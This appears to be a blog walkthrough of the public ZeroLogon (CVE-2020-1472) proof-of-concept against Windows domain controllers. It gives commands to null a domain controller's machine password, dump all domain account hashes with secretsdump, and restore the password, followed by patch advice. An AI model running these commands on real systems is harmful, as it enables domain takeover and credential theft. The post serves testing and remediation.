Secura has a great blog post on this topic already, but I wanted to share my experience with actually playing with their proof-of-concept exploit code. You can read about this exploit on their blog at https://www.secura.com/blog/zero-logon.
The exploit abuses the Netlogon Remote Protocol in Windows, which among other things, can be used to update computer passwords.
This vulnerability, and patch, isn’t exactly new. Microsoft released a patch for it last month, but there are now some public POCs in the wild that anybody can get their hands on, making this much more dangerous to leave un-patched.
First, we’re going to need a few things from GitHub. I like to download the tools in my /opt directory. You can run the following command to download the prerequisites.
sudo git clone https://github.com/dirkjanm/CVE-2020-1472.git
And then we need to download and install Impacket.
sudo git clone https://github.com/SecureAuthCorp/impacket.git
sudo pip3 install .
Performing the Exploit
The above mentioned POC exploit will reset the password of the domain controller account, so BE CAREFUL RUNNING IN PRODUCTION as it will break communication to other domain controllers in the domain.
To reset the password of the domain controller account and make it null, we can use the following command.
python3 cve-2020-1472-exploit.py <netBIOS-Hostname> <targetIP>
If you see that the exploit was successful, you should then be able to run a command like the following to dump all of the domain account hashes.
sudo secretsdump.py -just-dc <domain>/<hostname>\$@<targetIP>
Restoring the Environment
The proof-of-concept exploit code also includes a script for restoring the old credential post-exploitation. To do this, you can grab the hex encoded machine password from the secretsdump.py output and then use the following command.
sudo python restorepassword.py <domain>/<hostname>@<hostname> -target-ip <target-IP> -hexpass <hex-credential>
Patching the Exploit
A patch is available from Microsoft at the following URL. https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472
While the above mentioned article includes a table with a list of patches, I’d highly recommend checking the Windows Update Catalog for patches that might have superseded the articles mentioned in this table. For example, the September roll-ups contain this patch and are not listed in the table.
Running this exploit against a machine that has received the patch will return the following result.
Donations and Support:
Like my content? Please consider supporting me on Patreon:
Purchase a VPN Using my Affiliate Link